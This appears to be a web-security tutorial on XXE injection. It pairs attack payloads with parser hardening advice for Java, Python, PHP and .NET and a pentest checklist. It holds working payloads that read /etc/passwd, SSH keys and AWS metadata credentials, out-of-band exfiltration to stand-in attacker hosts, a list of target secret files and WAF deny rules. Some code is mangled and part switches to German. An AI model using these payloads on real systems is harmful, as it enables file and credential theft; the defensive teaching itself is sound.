XXE - XML External Entity Injection
XML External Entity (XXE) Injection is a vulnerability in XML parsers that allows external entities to be embedded in XML documents. Attackers use XXE to read local files (/etc/passwd, AWS credentials), carry out SSRF attacks, or, in rare cases, achieve remote code execution. XXE is listed as A04 in the OWASP Top 10 2017 and occurs particularly in insecure XML parser configurations (libxml2, Java SAXParser, .NET XmlDocument).
XXE is one of the most insidious web vulnerabilities because it often occurs in hidden XML processing paths—in upload endpoints, SOAP services, SVG files, Office documents, and REST APIs with XML support. An attacker who finds XXE in an internal system can use it to read cloud credentials from the metadata service and compromise the entire AWS infrastructure.
XXE Basic Principle
Normal XML Entities
<!DOCTYPE note [
<!ENTITY name "Alice">
]>
<note>
<to>&name;</to>
</note>
&name; expands to "Alice"—completely harmless.
External Entity – The Problem
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
The parser reads /etc/passwd and inserts the content. The server returns the /etc/passwd content in the response.
Why Is This Possible?
- The XML standard allows external entities
- Many XML parsers enable external entities by default
- Java SAX parser: insecure by default prior to Java 8
- libxml2: external entity loading enabled by default
- .NET XmlDocument: insecure up to .NET 4.5.2
XXE Payloads
File Reading (Linux)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
Typical Target Files:
| Path | Content |
|---|---|
file:///etc/passwd | User accounts |
file:///etc/shadow | Password hashes (if accessible!) |
file:///etc/hosts | Internal hostnames |
file:///proc/self/environ | Environment variables (API keys!) |
file:///home/user/.ssh/id_rsa | SSH private keys |
file:///var/www/html/config.php | Database passwords |
File Reading (Windows)
file:///C:/Windows/system32/drivers/etc/hostsfile:///C:/inetpub/wwwroot/web.config- IIS configurationfile:///C:/Users/Administrator/.ssh/id_rsa
AWS Credentials via XXE + SSRF
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role">
]>
<foo>&xxe;</foo>
Reads temporary AWS credentials from the EC2 Instance Metadata Service (IMDS). A critical finding in AWS environments, as the entire account can be compromised.
Blind XXE (Out-of-Band)
If no direct response is received, the attacker can still exfiltrate data.
Proof of XXE Vulnerability:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://ATTACKER-SERVER.com/test?data=">
]>
<foo>&xxe;</foo>
The attacker’s server receives an HTTP request as proof.
External DTD on attacker’s server (evil.dtd):
<!--ENTITY % file SYSTEM "file:///etc/passwd"-->
<!--ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://ATTACKER.com/?data=%file;'-->
">
%eval;
%exfil;
Payload to target system:
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://ATTACKER.com/evil.dtd">
xml%remote;
]>
<foo>trigger</foo>
XXE via SVG Upload
SVG files are XML. Upload endpoints for "Upload Avatar" or "Thumbnail" are frequently affected:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>```
When the SVG is rendered, the hostname appears in the image.
### XXE via XLSX/DOCX Upload
Office documents are ZIP archives containing XML files. To manipulate them:
```bash
# 1. Unzip the original file:
unzip doc.docx -d doc/
# 2. Add XXE payload to [Content_Types].xml
# 3. Repack:
zip -r evil.docx doc/
XXE in SOAP Web Services
POST /soap/service HTTP/1.1
Content-Type: text/xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="...">
<soap:Body>
<getUser>
<username>&xxe;</username>
</getUser>
</soap:Body>
</soap:Envelope>
XXE Mitigation Measures
Configure the parser securely
Java (SAXParser, DocumentBuilder):
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Disable external entities:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// OR more granularly:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();
Python (defusedxml) - recommended:
# DO NOT USE: lxml.etree.parse(file) - XXE-vulnerable!
# GOOD: Use defusedxml:
import defusedxml.ElementTree as ET
tree = ET.parse(file) # Automatically blocks: XXE, Billion Laughs, DTD
Python (lxml) - explicitly configured:
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False
)
tree = etree.parse(file, parser)
PHP:
// libxml_disable_entity_loader() - deprecated in PHP 8.0, now default!
// PHP 7.x:
libxml_disable_entity_loader(true);
// PHP 8.0+: external entities are disabled by default!
// Nevertheless: use the LIBXML_NONET flag:
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET | LIBXML_DTDLOAD);
.NET (XmlDocument, XmlReader):
// Insecure (< .NET 4.5.2):
XmlDocument doc = new XmlDocument();
doc.Load(xmlInput); // Vulnerable to XXE!
// Safe:
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null; // Disable external resolvers
doc.Load(xmlInput);
// XmlReader (safer by default since .NET 4.5.2):
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
using XmlReader reader = XmlReader.Create(input, settings);
NGINX / WAF Level:
SecRule REQUEST_BODY "@rx SYSTEM\s*[\"']" \
"id:1001,phase:2,t:none,deny,status:400,msg:'XXE Attempt'"
SecRule REQUEST_BODY "@rx<!--ENTITY" \
"id:1002,phase:2,t:none,deny,status:400,msg:'XXE Entity Declaration'"
Design-Empfehlungen
- JSON statt XML wo möglich (JSON hat kein Entity-Problem)
- SVG-Upload: serverseitig in PNG/JPG konvertieren (Pillow/ImageMagick)
- Office-Dokument-Parser: spezialisierte Bibliotheken (Apache POI, python-docx) statt direktes XML-Parsing
- Input-Validation: Content-Type + Magic Bytes prüfen
XXE-Testing
Pentest-Vorgehen
Schritt 1 - XML-Input-Punkte identifizieren:
- Alle Endpunkte mit
Content-Type: application/xml/text/xml - Upload-Endpunkte (SVG, DOCX, XLSX, XML)
- SOAP-Endpoints
- JSON-APIs mit optionalem XML-Support (
Accept: application/xml)
Schritt 2 - Basis-Payload testen:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR.net/test"-->
]>
<xml>&xxe;</xml>
Does a DNS lookup or HTTP request arrive at the Collaborator?
Step 3 - Attempt file reading:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<xml>&xxe;</xml>
Is the hostname visible in the response?
Step 4 - Check for blind XXE:
If no direct output appears, attempt OOB exfiltration. interactsh is suitable as a callback server.
Step 5 - Automated Tools:
nuclei -t nuclei-templates/vulnerabilities/xxe/ -u https://target.com
Burp Pro: automatic XXE detection in Active Scan with Burp Collaborator as OOB proof.